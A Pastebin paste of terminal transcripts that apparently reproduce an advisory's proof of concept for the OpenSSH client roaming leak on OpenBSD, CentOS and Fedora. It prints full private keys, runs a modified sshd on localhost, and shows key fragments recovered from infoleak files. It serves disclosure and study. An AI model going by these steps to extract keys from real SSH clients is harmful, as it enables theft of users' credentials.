Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ head -n 1 /etc/motd
- OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
- $ /usr/bin/ssh -V
- OpenSSH_7.0, LibreSSL 2.2.2
- $ cat ~/.ssh/id_rsa
- -----BEGIN RSA PRIVATE KEY-----
- MIIEpAIBAAKCAQEAwe9ssfYbABhOGxnBDsPf5Hwypr3tVz4ZCK2Q9ZWWBYnk+KVL
- ruLv7NWzeuKF7ls8z4SdpP/09QIIWQO5xWmQ7OM7ndfHWexFoyS/MijorHLvwG1s
- 17KFF8aC5vcBTfVkWnFaERueyd+mxv+oIrskA3/DK7/Juojkq70aPAdafiWOuVT8
- L/2exFuzpSmwiXbPuiPgImO9O+9VQ4flZ4qlO18kZxXF948GisxxkceOYWTIX6uh
- xSs/NEGF/drmB4RTAL1ZivG+e4IMxs5naLz4u3Vb8WTDeS6D62WM1eq5JRdlZtGP
- vavL01Kv3sYFvoD0OPUU4BjU8bd4Qb30C3719wIDAQABAoIBAG4zFpipN/590SQl
- Jka1luvGhyGoms0QRDliJxTlwzGygaGoi7D800jIxgv13BTtU0i4Grw/lXoDharP
- Kyi6K9fv51hx3J2EXK2vm9Vs2YnkZcf6ZfbLQkWYT5nekacy4ati7cL65uffZm19
- qJTTsksqtkSN3ptYXlgYRGgH5av3vaTSTGStL8D0e9fcrjSdN0UntjBB7QGT8ZnY
- gQ1bsSlcPM/TB6JYmHWdpCAVeeCJdDhYoHKlwgQuTdpubdlM80f6qat7bsm95ZTK
- QolQFpmAXeU4Bs5kFlm0K0qYFkWNdI16ScOpK6AQZGUTcHICeRL3GEm6NC0HYBNt
- gKHPucECgYEA7ssL293PZR3W9abbivDxvtCjA+41L8Rl8k+J0Dj0QTQfeHxHD2eL
- cQO2lx4N3E9bJMUnnmjxIT84Dg7SqOWThh3Rof+c/vglyy5o/CzbScISQTvjKfuB
- +s5aNojIqkyKaesQyxmdacLxtBBppZvzCDTHBXvAe4t8Bus2DPBzbzsCgYEAz+jl
- hcsMQ1egiVVpxHdjtm3+D1lbgITk0hzIt9DYEIMBJ7y5Gp2mrcroJAzt7VA2s7Ri
- hBSGv1pjz4j82l00odjCyiUrwvE1Gs48rChzT1PcQvtPCCanDvxOHwpKlUTdUKZh
- vhxPK/DW3IgUL0MlaTOjncR1Zppz4xpF/cSlYHUCgYB0MhVZLXvHxlddPY5C86+O
- nFNWjEkRL040NIPo8G3adJSDumWRl18A5T+qFRPFik/depomuQXsmaibHpdfXCcG
- 8eeaHpm0b+dkEPdBDkq+f1MGry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra
- uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc
- prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO
- ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V
- 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp
- ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz
- uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
- -----END RSA PRIVATE KEY-----
- # "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
- $ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 1 %h %p" -p 222 127.0.0.1
- [connection suspended, press return to resume]Segmentation fault (core dumped)
- (this example requires a ProxyCommand because of the NULL-aitop bug
- described in the Mitigating Factors of the Information Leak section, and
- crashes because of the NULL-pointer dereference discussed in the
- Mitigating Factors of the Buffer Overflow section)
- # cat /tmp/roaming-a5eca355/infoleak
- ry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra
- uWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc
- prs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO
- ZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V
- 8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp
- ppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz
- uiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==
- ------------------------------------------------------------------------
- Private Key Disclosure example: CentOS 7, 1024-bit DSA key
- ------------------------------------------------------------------------
- $ grep PRETTY_NAME= /etc/os-release
- PRETTY_NAME="CentOS Linux 7 (Core)"
- $ /usr/bin/ssh -V
- OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
- $ cat ~/.ssh/id_dsa
- -----BEGIN DSA PRIVATE KEY-----
- MIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe
- kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n
- GLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a
- Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC
- o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2
- hUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X
- iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l
- B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
- QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS
- F9AoVoZFKEGn4FEoYIqY3a4=
- -----END DSA PRIVATE KEY-----
- # env ROAMING="heap_massaging:linux" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
- $ /usr/bin/ssh -p 222 127.0.0.1
- ...
- # strings /tmp/roaming-b7b16dfc/infoleak
- jJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe
- kt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5
- # strings /tmp/roaming-b324ce87/infoleak
- IuQL
- R2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a
- Nmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC
- o7l7mJT+lI9v
- # strings /tmp/roaming-24011739/infoleak
- KjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC
- o7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC
- # strings /tmp/roaming-37456846/infoleak
- LsBlstpuQ4Hr2DHmalL8X
- iISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l
- B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA
- yq4Kwj/
- # strings /tmp/roaming-988ff54c/infoleak
- GBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l
- B7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/
- # strings /tmp/roaming-53887fa5/infoleak
- /4oatxFUV5V8aniqyq4Kwj/
- QlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS
- F9AoVoZFKEGn4FEoYIqY3a4
- ------------------------------------------------------------------------
- Private Key Disclosure example: Fedora 20, 2048-bit RSA key
- ------------------------------------------------------------------------
- $ grep PRETTY_NAME= /etc/os-release
- PRETTY_NAME="Fedora 20 (Heisenbug)"
- $ /usr/bin/ssh -V
- OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
- $ cat ~/.ssh/id_rsa
- -----BEGIN RSA PRIVATE KEY-----
- MIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz
- HLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp
- o9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ
- /B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy
- 2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK
- cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt
- j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o
- 6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06
- Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV
- JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr
- Hiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l
- PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
- rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo
- /euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot
- gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
- jwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY
- vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y
- 3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF
- Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P
- pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU
- dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm
- qK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5
- r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp
- P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+
- ZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=
- -----END RSA PRIVATE KEY-----
- # env ROAMING="heap_massaging:linux" "`pwd`"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
- $ /usr/bin/ssh -p 222 127.0.0.1
- ...
- # strings /tmp/roaming-a2bbc5f6/infoleak
- cRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt
- j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG
- # strings /tmp/roaming-47b46456/infoleak
- RGAcE0nc
- GCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt
- j737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o
- 6GEmk/oB9
- # strings /tmp/roaming-7a6717ae/infoleak
- cawMW4LZ1
- Xz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV
- JQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p
- # strings /tmp/roaming-f3091f08/infoleak
- lZ3w0qHe
- nSolsDs2k8wHbVP4VtLE8l
- PRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ
- # strings /tmp/roaming-62a9e9a3/infoleak
- lZ3w0qHe
- r3TwTa0pPEk11
- LbcsTEJ
- rtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo
- /euhzdYixxIkfqyopnYFoER26u37/OHe37P
- # strings /tmp/roaming-8de31ed5/infoleak
- 7qyvNznQ
- 26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot
- gxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa
- # strings /tmp/roaming-f5e0fbcc/infoleak
- yESI62wOuaY
- vJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y
- 3fBC3h9BN5banCw6VKfnvm8/q+bwSxS
- # strings /tmp/roaming-9be933df/infoleak
- QRtzK/GpRuMC1
- C3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF
- Q4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT
- # strings /tmp/roaming-ee4d1e6c/infoleak
- SG3aTqYp
- tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P
- pdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s
- # strings /tmp/roaming-c2bfd69c/infoleak
- SG3aTqYp
- 6JmTOun5zVV6A
- H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU
- dz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s
- # strings /tmp/roaming-2b3217a1/infoleak
- DGLfFGdO
- r5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp
- P/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ
- # strings /tmp/roaming-1e275747/infoleak
- g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement